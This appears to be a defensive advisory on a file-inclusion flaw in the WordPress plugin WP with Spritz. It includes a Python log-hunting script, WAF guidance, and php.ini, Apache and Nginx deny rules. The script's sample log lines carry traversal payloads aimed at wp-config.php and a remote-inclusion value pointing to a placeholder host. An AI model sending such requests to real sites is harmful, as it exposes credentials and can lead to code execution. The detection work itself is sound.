CVE-2018-25329 Overview
CVE-2018-25329 is a remote file inclusion (RFI) vulnerability in the WordPress plugin WP with Spritz version 1.0. The flaw exists in wp.spritz.content.filter.php, which accepts a url parameter without validation. Unauthenticated attackers can send crafted GET requests to read arbitrary local files or include remote resources. Successful exploitation discloses sensitive data such as system configuration files and stored credentials. The vulnerability is classified under CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program).
Critical Impact
Unauthenticated remote attackers can read arbitrary files on the host, including configuration files containing database credentials and WordPress secret keys.
Affected Products
- WordPress Plugin WP with Spritz version 1.0
- WordPress installations using the WP with Spritz plugin
- The vulnerable script wp.spritz.content.filter.php
Discovery Timeline
- 2026-05-17 - CVE-2018-25329 published to NVD
- 2026-05-18 - Last updated in NVD database
Technical Details for CVE-2018-25329
Vulnerability Analysis
The WP with Spritz plugin exposes the script wp.spritz.content.filter.php, which directly uses a user-supplied url parameter inside a PHP file inclusion function. Because PHP file inclusion functions resolve both local paths and remote URLs when allow_url_include is enabled, the parameter doubles as a vector for local file inclusion (LFI) and remote file inclusion (RFI). Attackers exploit the flaw with a single GET request, requiring no authentication, no user interaction, and no privileges. The EPSS score is 0.03%, reflecting limited active exploitation given the plugin's small footprint.
Root Cause
The root cause is improper control of a filename used in a PHP include or require statement, mapped to CWE-98. The plugin neither sanitizes nor restricts the url parameter to an allowlist of expected values. There is no path normalization, scheme filtering, or check against directory traversal sequences such as ../.
Attack Vector
The attack vector is network-based. An attacker issues a GET request to wp.spritz.content.filter.php and supplies a malicious value in the url parameter. Typical payloads target local files such as /etc/passwd or WordPress files like wp-config.php to retrieve database credentials and authentication keys. When allow_url_include is enabled in php.ini, attackers can also point url to an external server hosting PHP code, escalating the issue to remote code execution.
The vulnerability mechanism is described in the Exploit-DB entry #44544 and the VulnCheck advisory.
Detection Methods for CVE-2018-25329
Indicators of Compromise
- HTTP GET requests to wp.spritz.content.filter.php containing a url parameter, especially with values referencing wp-config.php, /etc/passwd, or external http:// or https:// URLs.
- Web server access logs showing repeated requests to the plugin script from a single source IP.
- Outbound network connections from the web server to attacker-controlled hosts referenced in the url parameter.
Detection Strategies
- Inspect WordPress plugin directories for the presence of wp-with-spritz and the wp.spritz.content.filter.php script.
- Configure web application firewall (WAF) rules to flag requests containing path traversal sequences or remote URL schemes inside the url parameter.
- Hunt across web access logs for the pattern wp.spritz.content.filter.php?url= paired with suspicious values.
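The log hunt described in the indicators and detection strategies above, as an added example that is not part of the original advisory or the plugin's code. It assumes Apache/Nginx Combined Log Format; the helper names `classify` and `hunt` are hypothetical and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "wp.spritz.content.filter.php"
# Combined Log Format: client IP, ident, user, [time], "METHOD target PROTO"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

def classify(value):
    """Return the reasons a url= value matches the advisory's indicators."""
    for _ in range(3):  # undo nested percent-encoding such as %252e%252e%252f
        value = unquote(value)
    v = value.lower().replace("\\", "/")
    reasons = []
    if "../" in v:
        reasons.append("traversal")
    if re.match(r"[a-z][a-z0-9+.-]*://", v):
        reasons.append("url-scheme")
    if v.startswith("/") or "wp-config.php" in v or "etc/passwd" in v:
        reasons.append("local-file")
    return reasons

def hunt(lines):
    """Map source IP -> [(url value, reasons)] for requests to the plugin script."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        if not unquote(parts.path).lower().endswith("/" + SCRIPT):
            continue
        # Any url= on this script is an indicator; reasons rank how suspicious it is.
        for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
            hits[ip].append((value, classify(value)))
    return dict(hits)

# Constructed sample lines (documentation IP ranges), not taken from a real log.
P = "/wp-content/plugins/wp-with-spritz/" + SCRIPT
T = '{} - - [01/Jan/2025:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    T.format("203.0.113.5", P + "?url=../../../wp-config.php"),
    T.format("203.0.113.5", P + "?url=%252e%252e%252f%252e%252e%252fwp-config.php"),
    T.format("198.51.100.9", P + "?url=http://192.0.2.44/a.txt"),
    T.format("192.0.2.10", "/index.php?url=../../etc/passwd"),  # other script: ignored
]

if __name__ == "__main__":
    print(hunt(SAMPLE_LOG))
```

Grouping by source IP surfaces the repeated-request indicator, and the repeated decoding catches double-encoded traversal that a plain substring search over the raw log would miss.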
Monitoring Recommendations
- Monitor PHP error logs for include or require warnings referencing unexpected file paths.
- Track outbound HTTP requests originating from PHP worker processes to identify RFI callback activity.
- Alert on reads of sensitive files such as wp-config.php by the web server user outside of normal application flows.
How to Mitigate CVE-2018-25329
Immediate Actions Required
- Deactivate and remove the WP with Spritz plugin from all WordPress installations until a patched version is available.
- Rotate WordPress database credentials, salts, and API keys if log review shows requests to wp.spritz.content.filter.php with a url parameter.
- Restrict access to the plugin's PHP scripts at the web server level using deny rules.
Patch Information
No vendor patch is referenced in the published CVE data. The plugin remains available for download from the WordPress plugin repository, but no fixed release has been published. Administrators should treat the plugin as end-of-life and replace it with a maintained alternative.
Workarounds
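- Set allow_url_include = Off and allow_url_fopen = Off in php.ini to block remote inclusion payloads. These settings do not prevent reads of local files, so they reduce the impact rather than remove the flaw.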
- Deploy WAF signatures that block requests to wp.spritz.content.filter.php containing path traversal or URL scheme indicators in the url parameter.
- Apply least-privilege file permissions so the web server user cannot read sensitive system files such as /etc/shadow.
- Remove the plugin directory entirely if uninstallation through the WordPress admin console is not feasible.
; php.ini: disable remote inclusion (php.ini comments start with ";")
allow_url_include = Off
allow_url_fopen = Off

# Apache (2.4 syntax): block direct access to the vulnerable script
<Files "wp.spritz.content.filter.php">
    Require all denied
</Files>

# Nginx: deny access to the vulnerable script.
# Place this before any generic "location ~ \.php$" block, because nginx
# uses the first regex location that matches.
location ~* /wp-content/plugins/wp-with-spritz/wp\.spritz\.content\.filter\.php$ {
    deny all;
    return 403;
}


